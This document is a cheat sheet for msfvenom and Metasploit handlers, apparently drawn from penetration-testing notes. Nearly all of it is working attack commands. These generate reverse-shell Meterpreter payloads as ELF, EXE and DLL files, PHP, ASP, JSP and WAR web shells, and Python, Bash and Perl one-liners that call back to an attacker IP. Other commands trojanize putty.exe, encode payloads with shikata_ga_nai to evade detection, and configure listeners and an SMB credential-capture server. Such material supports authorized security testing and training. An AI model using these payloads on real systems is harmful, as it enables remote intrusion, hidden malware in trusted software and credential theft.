MSFVenom - Documentation

Link to this headingMSFVenom

-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads -l, --list [module_type] List a module type example: payloads, encoders, nops, all -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload -f, --format <format> Output format (use --help-formats for a list) -e, --encoder [encoder] The encoder to use -a, --arch <architecture> The architecture to use --platform <platform> The platform of the payload -s, --space <length> The maximum size of the resulting payload -b, --bad-chars <list> The list of characters to avoid example: '\x00\xff' -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread --payload-options List the payload's standard options -o, --out <path> Save the payload -v, --var-name <name> Specify a custom variable name to use for certain output formats -h, --help Show this message --help-formats List available formats

Link to this headingListing Modules

List payloads:
msfvenom -l payloads

List Encoders:
msfvenom -l encoders

List Payload Options:

msfvenom -p [payload] --payload-options

Link to this headingExamples

Linux Binaries:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows Binaries:
Encoding, Bad Characters and using a template

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f dll -o pentestlab.dll msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe -o met_reverse_tcp.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe -i 5 -e x86/shikata_ga_nai -o mal.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe --bad-chars '\x00\x0A\x0D' -o payload.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f exe -a x86 --platform windows -x putty.exe -k -e x86/shikata_ga_nai -i 5 --bad-chars '\x00\x0A\x0D' -o putty1.exe

PHP Web Payloads:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f raw > shell.php

ASP Web Payloads:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f asp > shell.asp

JSP Web Payloads:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f raw > shell.jsp

WAR Web Payloads:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f war > shell.war

Python Scripting Payloads:

msfvenom -p cmd/unix/reverse_python LHOST=192.168.100.3 LPORT=44444 -f raw > shell.py

BASH Scripting Payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.100.3 LPORT=44444 -f raw > shell.sh

Perl Scripting Payloads:

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.100.3 LPORT=44444 -f raw > shell.pl

Link to this headingHandlers

use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z mssf > use exploit/multi/handler msf exploit(handler) > setg PAYLOAD java/jsp_shell_reverse_tcp PAYLOAD => java/jsp_shell_reverse_tcp set LHOST 10.11.0.159 set LPORT 4343 LPORT => 4343 msetg SHELL cmd.exe exploit -j -z

set consolelogging true set loglevel 5 set sessionlogging true set timestampoutput true set prompt %T S:%S J:%J setg VERBOSE true use auxiliary/server/capture/smb set JOHNPWFILE john.txt run use multi/handler set payload windows/meterpreter/reverse_tcp setg LHOST 0.0.0.0 set SSL true set LPORT 5667 setg AutoLoadStdapi true setg AutoSystemInfo true setg ExitOnSession false setg EnableStageEncoding true exploit -j -z set payload windows/x64/meterpreter/reverse_tcp set lport 5666 setg lhost 0.0.0.0 set payload windows/meterpreter/reverse_winhttps set LPORT 443 set HandlerSSLCert /opt/CERT.pem set IgnoreUnknownPayloads true set AutoRunScript 'post/multi/gather/run_console_rc_file RESOURCE=/opt/autorun.rc' set StagerVerifySSLCert true exploit -j -z setg Exe::CUSTOM /opt/ConsoleApp4.exe set payload windows/meterpreter/reverse_tcp set LPORT 5666 set HandlerSSLCert /opt/CERT.pem set IgnoreUnknownPayloads true set StagerVerifySSLCert true set AutoRunScript 'post/multi/gather/run_console_rc_file RESOURCE=/opt/autorun1.rc' exploit -j -z